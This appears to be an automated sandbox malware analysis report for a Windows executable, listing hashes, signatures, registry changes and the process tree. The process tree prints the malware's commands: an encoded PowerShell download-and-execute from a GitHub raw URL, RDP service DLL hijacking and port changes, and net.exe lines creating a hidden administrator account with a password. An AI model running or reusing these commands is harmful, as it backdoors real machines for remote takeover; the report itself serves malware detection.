Analysis
-
max time kernel
59s -
max time network
68s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-07-2021 13:09
Static task
static1
Behavioral task
behavioral1
Sample
753f0b9b7183051f2f09ccd68d418969.exe
Resource
win7v20210408
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
753f0b9b7183051f2f09ccd68d418969.exe
Resource
win10v20210408
0 signatures
0 seconds
General
-
Target
753f0b9b7183051f2f09ccd68d418969.exe
-
Size
6.0MB
-
MD5
753f0b9b7183051f2f09ccd68d418969
-
SHA1
ffcd59bc747170fcd30032d3ca1da6861330e99c
-
SHA256
5c7e8b5ecf30c04a3a6e3726328c37eccfc8f0656797894d71e2ac7c27c20c9d
-
SHA512
1e36d40c6245943430c7ed1dc1ed19a88f930842bc14f478dfee3f91fb18d7d3026312dc8ec856b3982f97d0e93510833945dee0b27533ae6a4130cee0f2dfec
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 14 2840 powershell.exe 16 2840 powershell.exe 17 2840 powershell.exe 18 2840 powershell.exe 20 2840 powershell.exe 22 2840 powershell.exe 24 2840 powershell.exe 26 2840 powershell.exe 28 2840 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000600000001ab50-350.dat upx behavioral2/files/0x000600000001ab54-351.dat upx -
Loads dropped DLL 2 IoCs
pid Process 2184 Process not Found 2184 Process not Found -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC5C8.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC5EA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ysmm5p1i.fcg.psm1 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC5B8.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zaxbrigs.ztr.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC549.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC5D9.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4088 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2000 powershell.exe 2000 powershell.exe 2000 powershell.exe 3868 powershell.exe 3868 powershell.exe 3868 powershell.exe 3184 powershell.exe 3184 powershell.exe 3184 powershell.exe 4060 powershell.exe 4060 powershell.exe 4060 powershell.exe 2000 powershell.exe 2000 powershell.exe 2000 powershell.exe 2840 powershell.exe 2840 powershell.exe 2840 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 620 Process not Found 620 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeIncreaseQuotaPrivilege 3868 powershell.exe Token: SeSecurityPrivilege 3868 powershell.exe Token: SeTakeOwnershipPrivilege 3868 powershell.exe Token: SeLoadDriverPrivilege 3868 powershell.exe Token: SeSystemProfilePrivilege 3868 powershell.exe Token: SeSystemtimePrivilege 3868 powershell.exe Token: SeProfSingleProcessPrivilege 3868 powershell.exe Token: SeIncBasePriorityPrivilege 3868 powershell.exe Token: SeCreatePagefilePrivilege 3868 powershell.exe Token: SeBackupPrivilege 3868 powershell.exe Token: SeRestorePrivilege 3868 powershell.exe Token: SeShutdownPrivilege 3868 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeSystemEnvironmentPrivilege 3868 powershell.exe Token: SeRemoteShutdownPrivilege 3868 powershell.exe Token: SeUndockPrivilege 3868 powershell.exe Token: SeManageVolumePrivilege 3868 powershell.exe Token: 33 3868 powershell.exe Token: 34 3868 powershell.exe Token: 35 3868 powershell.exe Token: 36 3868 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeIncreaseQuotaPrivilege 3184 powershell.exe Token: SeSecurityPrivilege 3184 powershell.exe Token: SeTakeOwnershipPrivilege 3184 powershell.exe Token: SeLoadDriverPrivilege 3184 powershell.exe Token: SeSystemProfilePrivilege 3184 powershell.exe Token: SeSystemtimePrivilege 3184 powershell.exe Token: SeProfSingleProcessPrivilege 3184 powershell.exe Token: SeIncBasePriorityPrivilege 3184 powershell.exe Token: SeCreatePagefilePrivilege 3184 powershell.exe Token: SeBackupPrivilege 3184 powershell.exe Token: SeRestorePrivilege 3184 powershell.exe Token: SeShutdownPrivilege 3184 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeSystemEnvironmentPrivilege 3184 powershell.exe Token: SeRemoteShutdownPrivilege 3184 powershell.exe Token: SeUndockPrivilege 3184 powershell.exe Token: SeManageVolumePrivilege 3184 powershell.exe Token: 33 3184 powershell.exe Token: 34 3184 powershell.exe Token: 35 3184 powershell.exe Token: 36 3184 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeIncreaseQuotaPrivilege 4060 powershell.exe Token: SeSecurityPrivilege 4060 powershell.exe Token: SeTakeOwnershipPrivilege 4060 powershell.exe Token: SeLoadDriverPrivilege 4060 powershell.exe Token: SeSystemProfilePrivilege 4060 powershell.exe Token: SeSystemtimePrivilege 4060 powershell.exe Token: SeProfSingleProcessPrivilege 4060 powershell.exe Token: SeIncBasePriorityPrivilege 4060 powershell.exe Token: SeCreatePagefilePrivilege 4060 powershell.exe Token: SeBackupPrivilege 4060 powershell.exe Token: SeRestorePrivilege 4060 powershell.exe Token: SeShutdownPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeSystemEnvironmentPrivilege 4060 powershell.exe Token: SeRemoteShutdownPrivilege 4060 powershell.exe Token: SeUndockPrivilege 4060 powershell.exe Token: SeManageVolumePrivilege 4060 powershell.exe Token: 33 4060 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 652 wrote to memory of 2000 652 753f0b9b7183051f2f09ccd68d418969.exe 75 PID 652 wrote to memory of 2000 652 753f0b9b7183051f2f09ccd68d418969.exe 75 PID 2000 wrote to memory of 2388 2000 powershell.exe 77 PID 2000 wrote to memory of 2388 2000 powershell.exe 77 PID 2388 wrote to memory of 3676 2388 csc.exe 78 PID 2388 wrote to memory of 3676 2388 csc.exe 78 PID 2000 wrote to memory of 3868 2000 powershell.exe 79 PID 2000 wrote to memory of 3868 2000 powershell.exe 79 PID 2000 wrote to memory of 3184 2000 powershell.exe 84 PID 2000 wrote to memory of 3184 2000 powershell.exe 84 PID 2000 wrote to memory of 4060 2000 powershell.exe 87 PID 2000 wrote to memory of 4060 2000 powershell.exe 87 PID 2000 wrote to memory of 384 2000 powershell.exe 89 PID 2000 wrote to memory of 384 2000 powershell.exe 89 PID 2000 wrote to memory of 4088 2000 powershell.exe 90 PID 2000 wrote to memory of 4088 2000 powershell.exe 90 PID 2000 wrote to memory of 2304 2000 powershell.exe 91 PID 2000 wrote to memory of 2304 2000 powershell.exe 91 PID 2000 wrote to memory of 3176 2000 powershell.exe 92 PID 2000 wrote to memory of 3176 2000 powershell.exe 92 PID 3176 wrote to memory of 3868 3176 net.exe 93 PID 3176 wrote to memory of 3868 3176 net.exe 93 PID 2000 wrote to memory of 3936 2000 powershell.exe 94 PID 2000 wrote to memory of 3936 2000 powershell.exe 94 PID 3936 wrote to memory of 212 3936 cmd.exe 95 PID 3936 wrote to memory of 212 3936 cmd.exe 95 PID 212 wrote to memory of 188 212 cmd.exe 96 PID 212 wrote to memory of 188 212 cmd.exe 96 PID 188 wrote to memory of 2068 188 net.exe 97 PID 188 wrote to memory of 2068 188 net.exe 97 PID 2000 wrote to memory of 856 2000 powershell.exe 98 PID 2000 wrote to memory of 856 2000 powershell.exe 98 PID 856 wrote to memory of 940 856 cmd.exe 99 PID 856 wrote to memory of 940 856 cmd.exe 99 PID 940 wrote to memory of 2240 940 cmd.exe 100 PID 940 wrote to memory of 2240 940 cmd.exe 100 PID 2240 wrote to memory of 2324 2240 net.exe 101 PID 2240 wrote to memory of 2324 2240 net.exe 101 PID 3044 wrote to memory of 3160 3044 cmd.exe 105 PID 3044 wrote to memory of 3160 3044 cmd.exe 105 PID 3160 wrote to memory of 2180 3160 net.exe 106 PID 3160 wrote to memory of 2180 3160 net.exe 106 PID 3964 wrote to memory of 2104 3964 cmd.exe 109 PID 3964 wrote to memory of 2104 3964 cmd.exe 109 PID 2104 wrote to memory of 3752 2104 net.exe 110 PID 2104 wrote to memory of 3752 2104 net.exe 110 PID 2128 wrote to memory of 196 2128 cmd.exe 113 PID 2128 wrote to memory of 196 2128 cmd.exe 113 PID 196 wrote to memory of 3732 196 net.exe 114 PID 196 wrote to memory of 3732 196 net.exe 114 PID 1964 wrote to memory of 3160 1964 cmd.exe 117 PID 1964 wrote to memory of 3160 1964 cmd.exe 117 PID 3160 wrote to memory of 840 3160 net.exe 118 PID 3160 wrote to memory of 840 3160 net.exe 118 PID 2860 wrote to memory of 2104 2860 cmd.exe 121 PID 2860 wrote to memory of 2104 2860 cmd.exe 121 PID 2104 wrote to memory of 3512 2104 net.exe 122 PID 2104 wrote to memory of 3512 2104 net.exe 122 PID 3940 wrote to memory of 196 3940 cmd.exe 125 PID 3940 wrote to memory of 196 3940 cmd.exe 125 PID 196 wrote to memory of 3732 196 net.exe 126 PID 196 wrote to memory of 3732 196 net.exe 126 PID 3044 wrote to memory of 2124 3044 cmd.exe 129 PID 3044 wrote to memory of 2124 3044 cmd.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\753f0b9b7183051f2f09ccd68d418969.exe"C:\Users\Admin\AppData\Local\Temp\753f0b9b7183051f2f09ccd68d418969.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nanxm2xf\nanxm2xf.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67F7.tmp" "c:\Users\Admin\AppData\Local\Temp\nanxm2xf\CSCF6F882309A884C72B75E9442E551A179.TMP"4⤵PID:3676
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:384
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4088
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2304
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3868
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2068
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2324
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2172
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:188
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc JZcq2RIf /add1⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc JZcq2RIf /add2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc JZcq2RIf /add3⤵PID:3752
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3732
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:840
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc JZcq2RIf1⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc JZcq2RIf2⤵
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc JZcq2RIf3⤵PID:3732
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:2124
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3964
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:2860
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2128
-
